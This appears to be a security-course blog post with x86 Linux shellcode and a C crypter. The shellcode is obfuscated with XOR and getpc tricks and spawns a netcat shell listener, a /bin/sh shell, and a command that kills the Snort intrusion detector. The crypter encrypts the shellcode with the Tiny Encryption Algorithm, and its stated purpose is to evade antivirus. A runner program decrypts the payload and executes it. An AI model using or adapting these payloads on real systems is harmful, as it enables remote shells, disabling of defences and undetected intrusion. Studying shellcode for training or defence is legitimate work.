xor ebx, 0x666425d2 ;xor the value in ebx with a number that will give us 0x3331702d
push ebx ;push 0x3331702d(-p13) onto the stack
mov edx, esp ;save stack pointer into edx
push eax
mov ecx, 0x89765432 ;move arbitrary value into ecx
mov ebx, 0x891e271d ;move a no. in ebx which if xored with arbitrary no. returns (68732F)
xor ebx, ecx ;xor the numbers
push ebx ;push the result onto the stack (/sh)
xor ecx, 0xE71F361D ;xor the value in ebx with a number that will give us 6E69622F
push ecx ;push the result onto the stack (/bin)
mov ebx, 0xb7fc2ff4 ;load arbitrary number into ebx
xor ebx, 0xd28a43d9 ;xor in with a number that will give us 0x65766c2d (-lve)
push ebx ;push 0x65766c2d onto the stack
mov ecx,esp ;save stack pointer into ecx
push eax
push 0xff636e2f ;push 0xff636e2f (we need only the 636e2f) /nc
mov [ebp-29], al ;since al is 0 at this point we overwrite the 0xff with it
mov ebx, 0xb7fc2ff4 ;load random value into ebx
xor ebx, 0xD9954DDB ;load value which if xored with ebx returns 0x6e69622f
push ebx ;push 0x6e69622f (/bin)
mov ebx, esp ;save stack pointer into ebx
push eax ;rest of the code basically loads the parameters
push edx
push ecx
push ebx
cdq
mov ecx,esp
mov al, 0xb ;call execve
int 0x80

;Shellcode obfuscation
;http://shell-storm.org/shellcode/files/shellcode-863.php
;shellcode spawns a /bin/sh shell
;leverages a getpc technique
;Author: evil_comrade
;
global _start
section .text
_start:
fldz
jmp short call_shellcode
message: db 0xeb,0x25,0x5e,0x89,0xf7,0x31,0xc0,0x50,0x89,0xe2,0x50,0x83,0xc4,0x03,0x8d,0x76,0x04,0x33,0x06,0x50,0x31,0xc0,0x33,0x07,0x50,0x89,0xe3,0x31,0xc0,0x50,0x8d,0x3b,0x57,0x89,0xe1,0xb0,0x0b,0xcd,0x80,0xe8,0xd6,0xff,0xff,0xff,0x2f,0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68
call_shellcode:
fstenv [esp-0xc]
pop ebp
lea eax, [ebp+4]
jmp eax

;Shellcode obfuscation
;original link http://shell-storm.org/shellcode/files/shellcode-741.php
;Author: evil_comrade
;/usr/bin/killall snort
;
global _start
section .text
_start:
xor ebx,ebx ;Clear ebx register
imul ebx ;Clear all other registers
mov ebx, eax
mov dword [esp-4], ebx
sub esp, 4
test eax, eax
push 0x74
mov edx, 0x615E5D62
add edx, 0x11111111
push edx ;push 0x726f6e73
mov esi, esp
push eax
push dword 0x6c6c616c
test eax, eax
push dword 0x6c696b2f
test ebx, ebx
push dword 0x6e69622f
push dword 0x7273752f
mov ebx,esp
push eax
push esi
push ebx
mov ecx, esp
cdq
mov al, 0xa
inc eax
int 0x80

Sunday, January 25, 2015

Tiny Encryption Algorithm Crypter

I chose to use the Tiny Encryption Algorithm (TEA) for writing my crypter because it's small and compiling it doesn't require importing any other libraries. It's also kind to the processor during the decryption process (remember the point is simply to evade AV), so the encryption doesn't have to be the strongest in the world. To find out more about crypters and their implementations you can check out this paper. Now on to the implementation of my crypter.
The reference code is from Wikipedia. I implemented it in C to leverage the language's speed. I used the basic /bin/sh shellcode to test the crypter. I tested it on an Ubuntu system.

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>

void encrypt(uint32_t *v, uint32_t *k);
void encryptBlock(uint8_t *data, uint32_t *len, uint32_t *key);

uint32_t TEAKey[4] = {0x68697071, 0x65646172, 0x6d6f635f, 0x6c697665};

/* The buffer is deliberately larger than the payload (the unused tail is
 * zero-filled) so that encryptBlock can round the payload up to whole
 * 8-byte blocks and append the length block without writing past the end
 * of the array. It must hold at least ((strlen + 7) / 8 + 1) * 8 bytes. */
uint8_t shellcode[128] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80";

int main()
{
    uint32_t *len;
    uint32_t shellcode_len = 0;
    uint32_t counter = 0;

    /* strlen() only works because the shellcode itself is null-free */
    shellcode_len = strlen((const char *)shellcode);
    len = &shellcode_len;
    if ((((shellcode_len + 7) / 8) + 1) * 8 > sizeof(shellcode)) {
        fputs("shellcode buffer too small for padding and length block\n", stderr);
        return 1;
    }
    encryptBlock(shellcode, len, TEAKey);
    puts("\nEncrypted:");
    for (counter = 0; counter < shellcode_len; counter++)
        printf("\\x%02x", shellcode[counter]);
    printf("\nLength: %d\n", shellcode_len);
    return 0;
}

void encryptBlock(uint8_t *data, uint32_t *len, uint32_t *key)
{
    uint32_t blocks, i;
    uint32_t *data32;

    /* treat the data as 32 bit unsigned integers */
    data32 = (uint32_t *)data;
    /* Find the number of 8 byte blocks, add one for the length */
    blocks = (((*len) + 7) / 8) + 1;
    /* Set the last block to the original data length */
    data32[(blocks * 2) - 1] = *len;
    /* Set the encrypted data length */
    *len = blocks * 8;
    for (i = 0; i < blocks; i++) {
        encrypt(&data32[i * 2], key);
    }
}

void encrypt(uint32_t *v, uint32_t *k)
{
    uint32_t v0 = v[0], v1 = v[1], sum = 0, i;            /* set up */
    uint32_t delta = 0x9e3779b9;                          /* a key schedule constant */
    uint32_t k0 = k[0], k1 = k[1], k2 = k[2], k3 = k[3];  /* cache key */
    for (i = 0; i < 32; i++) {                            /* basic cycle start */
        sum += delta;
        v0 += ((v1 << 4) + k0) ^ (v1 + sum) ^ ((v1 >> 5) + k1);
        v1 += ((v0 << 4) + k2) ^ (v0 + sum) ^ ((v0 >> 5) + k3);
    }                                                     /* end cycle */
    v[0] = v0; v[1] = v1;
}
We copy the shellcode we want to deploy into the shellcode field as shown above. You can change the key to whatever value you want, provided you retain the format. Next we compile the C file ("gcc TEA.c -o TEA") and then run it ("./TEA"). This gives us the encrypted /bin/sh shellcode. You should get output like this:
 
roman@ubuntu:~/SLAE/Shellcode/Crypter$ ./TEA

Encrypted:
\x89\x45\x8b\x36\x8a\xc9\x8b\x48\xd6\xb2\x9a\x53\xc8\x59\x18\xd4\x46\x26\x6e\xbf\x33
\xdc\x20\x5d\x46\x01\x38\x7c\x4d\x3e\x23\xf1\xa3\xaa\xbf\x73\x46\xdb\xcc\xcd
Length: 40
 
We then paste the above shellcode into another C program which will execute it. Make sure the key you use in this program (let's call it TEAExecuteShellcode.c) is the same as the one you used in TEA.c. What this program basically does is run the decryption algorithm on the shellcode and then execute it.

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>

void decrypt(uint32_t *v, uint32_t *k);
void decryptBlock(uint8_t *data, uint32_t *len, uint32_t *key);

/* must be the same key that TEA.c was built with */
uint32_t TEAKey[4] = {0x68697071, 0x65646172, 0x6d6f635f, 0x6c697665};

/* output of TEA.c: 40 bytes = 5 TEA blocks, the last one holding the length */
uint8_t shellcode[] = "\x89\x45\x8b\x36\x8a\xc9\x8b\x48\xd6\xb2\x9a\x53\xc8\x59\x18\xd4\x46\x26\x6e\xbf\x33\xdc\x20\x5d\x46\x01\x38\x7c\x4d\x3e\x23\xf1\xa3\xaa\xbf\x73\x46\xdb\xcc\xcd";

int main()
{
    uint32_t *len;
    /* sizeof rather than strlen: the encrypted bytes may legitimately contain 0x00 */
    uint32_t shellcode_len = sizeof(shellcode) - 1;

    len = &shellcode_len;
    decryptBlock(shellcode, len, TEAKey);
    puts("\nDecrypting and running Shellcode:");
    /* jump into the decrypted buffer: the data segment must be executable
     * (-z execstack) and the payload is 32-bit x86, so add -m32 when building
     * on a 64-bit host */
    int (*ret)() = (int (*)())shellcode;
    ret();
    return 0;
}

void decryptBlock(uint8_t *data, uint32_t *len, uint32_t *key)
{
    uint32_t blocks, i;
    uint32_t *data32;

    /* treat the data as 32 bit unsigned integers */
    data32 = (uint32_t *)data;
    /* Find the number of 8 byte blocks */
    blocks = (*len) / 8;
    for (i = 0; i < blocks; i++) {
        decrypt(&data32[i * 2], key);
    }
    /* Return the length of the original data */
    *len = data32[(blocks * 2) - 1];
}

void decrypt(uint32_t *v, uint32_t *k)
{
    uint32_t v0 = v[0], v1 = v[1], sum = 0xC6EF3720, i;   /* set up */
    uint32_t delta = 0x9e3779b9;                          /* a key schedule constant */
    uint32_t k0 = k[0], k1 = k[1], k2 = k[2], k3 = k[3];  /* cache key */
    for (i = 0; i < 32; i++) {                            /* basic cycle start */
        v1 -= ((v0 << 4) + k2) ^ (v0 + sum) ^ ((v0 >> 5) + k3);
        v0 -= ((v1 << 4) + k0) ^ (v1 + sum) ^ ((v1 >> 5) + k1);
        sum -= delta;
    }                                                     /* end cycle */
    v[0] = v0; v[1] = v1;
}
As usual we compile and run it: "gcc -fno-stack-protector -z execstack TEAExecuteShellcode.c -o TEAExecuteShellcode". Run the shellcode through objdump to make sure it has no nulls, and then run it: "./TEAExecuteShellcode". This should give us the /bin/sh shell, which means our crypter is working.